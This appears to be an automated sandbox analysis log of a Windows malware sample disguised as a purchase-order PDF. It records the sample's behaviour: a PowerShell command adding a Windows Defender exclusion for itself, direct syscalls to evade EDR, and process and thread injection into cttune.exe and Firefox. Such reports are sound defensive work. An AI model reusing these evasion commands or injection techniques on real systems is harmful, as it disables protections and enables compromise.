Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CCBF0 mov eax, dword ptr fs:[00000030h]	7_2_017CCBF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01808B28 mov eax, dword ptr fs:[00000030h]	7_2_01808B28
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01808B28 mov eax, dword ptr fs:[00000030h]	7_2_01808B28
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EEBD0 mov eax, dword ptr fs:[00000030h]	7_2_017EEBD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740BCD mov eax, dword ptr fs:[00000030h]	7_2_01740BCD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740BCD mov eax, dword ptr fs:[00000030h]	7_2_01740BCD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740BCD mov eax, dword ptr fs:[00000030h]	7_2_01740BCD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01760BCB mov eax, dword ptr fs:[00000030h]	7_2_01760BCB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01760BCB mov eax, dword ptr fs:[00000030h]	7_2_01760BCB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01760BCB mov eax, dword ptr fs:[00000030h]	7_2_01760BCB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180AB40 mov eax, dword ptr fs:[00000030h]	7_2_0180AB40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750BBE mov eax, dword ptr fs:[00000030h]	7_2_01750BBE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750BBE mov eax, dword ptr fs:[00000030h]	7_2_01750BBE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814A80 mov eax, dword ptr fs:[00000030h]	7_2_01814A80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BCA72 mov eax, dword ptr fs:[00000030h]	7_2_017BCA72
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BCA72 mov eax, dword ptr fs:[00000030h]	7_2_017BCA72
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177CA6F mov eax, dword ptr fs:[00000030h]	7_2_0177CA6F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177CA6F mov eax, dword ptr fs:[00000030h]	7_2_0177CA6F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177CA6F mov eax, dword ptr fs:[00000030h]	7_2_0177CA6F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746A50 mov eax, dword ptr fs:[00000030h]	7_2_01746A50
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750A5B mov eax, dword ptr fs:[00000030h]	7_2_01750A5B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750A5B mov eax, dword ptr fs:[00000030h]	7_2_01750A5B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01764A35 mov eax, dword ptr fs:[00000030h]	7_2_01764A35
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01764A35 mov eax, dword ptr fs:[00000030h]	7_2_01764A35
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177CA38 mov eax, dword ptr fs:[00000030h]	7_2_0177CA38
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177CA24 mov eax, dword ptr fs:[00000030h]	7_2_0177CA24
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176EA2E mov eax, dword ptr fs:[00000030h]	7_2_0176EA2E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CCA11 mov eax, dword ptr fs:[00000030h]	7_2_017CCA11
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177AAEE mov eax, dword ptr fs:[00000030h]	7_2_0177AAEE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177AAEE mov eax, dword ptr fs:[00000030h]	7_2_0177AAEE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740AD0 mov eax, dword ptr fs:[00000030h]	7_2_01740AD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01774AD0 mov eax, dword ptr fs:[00000030h]	7_2_01774AD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01774AD0 mov eax, dword ptr fs:[00000030h]	7_2_01774AD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01796ACC mov eax, dword ptr fs:[00000030h]	7_2_01796ACC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01796ACC mov eax, dword ptr fs:[00000030h]	7_2_01796ACC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01796ACC mov eax, dword ptr fs:[00000030h]	7_2_01796ACC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748AA0 mov eax, dword ptr fs:[00000030h]	7_2_01748AA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748AA0 mov eax, dword ptr fs:[00000030h]	7_2_01748AA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01796AA4 mov eax, dword ptr fs:[00000030h]	7_2_01796AA4
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01778A90 mov edx, dword ptr fs:[00000030h]	7_2_01778A90
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80 mov eax, dword ptr fs:[00000030h]	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D8D6B mov eax, dword ptr fs:[00000030h]	7_2_017D8D6B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814DAD mov eax, dword ptr fs:[00000030h]	7_2_01814DAD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740D59 mov eax, dword ptr fs:[00000030h]	7_2_01740D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740D59 mov eax, dword ptr fs:[00000030h]	7_2_01740D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740D59 mov eax, dword ptr fs:[00000030h]	7_2_01740D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748D59 mov eax, dword ptr fs:[00000030h]	7_2_01748D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748D59 mov eax, dword ptr fs:[00000030h]	7_2_01748D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748D59 mov eax, dword ptr fs:[00000030h]	7_2_01748D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748D59 mov eax, dword ptr fs:[00000030h]	7_2_01748D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748D59 mov eax, dword ptr fs:[00000030h]	7_2_01748D59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01808DAE mov eax, dword ptr fs:[00000030h]	7_2_01808DAE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01808DAE mov eax, dword ptr fs:[00000030h]	7_2_01808DAE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C8D20 mov eax, dword ptr fs:[00000030h]	7_2_017C8D20
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01736D10 mov eax, dword ptr fs:[00000030h]	7_2_01736D10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01736D10 mov eax, dword ptr fs:[00000030h]	7_2_01736D10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01736D10 mov eax, dword ptr fs:[00000030h]	7_2_01736D10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01774D1D mov eax, dword ptr fs:[00000030h]	7_2_01774D1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F8D10 mov eax, dword ptr fs:[00000030h]	7_2_017F8D10

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe

Memory written: C:\Users\user\Desktop\PO-000172483 pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: NULL target: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cttune.exe

Thread register set: target process: 1488

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cttune.exe

Thread APC queued: target process: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process created: C:\Users\user\Desktop\PO-000172483 pdf.exe "C:\Users\user\Desktop\PO-000172483 pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: ycnUEzgloE.exe, 0000000A.00000000.2522439895.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288907742.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685909546.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: ycnUEzgloE.exe, 0000000A.00000000.2522439895.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288907742.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685909546.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ycnUEzgloE.exe, 0000000A.00000000.2522439895.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288907742.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685909546.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ycnUEzgloE.exe, 0000000A.00000000.2522439895.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000A.00000002.3288907742.0000000001441000.00000002.00000001.00040000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000000.2685909546.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Users\user\Desktop\PO-000172483 pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
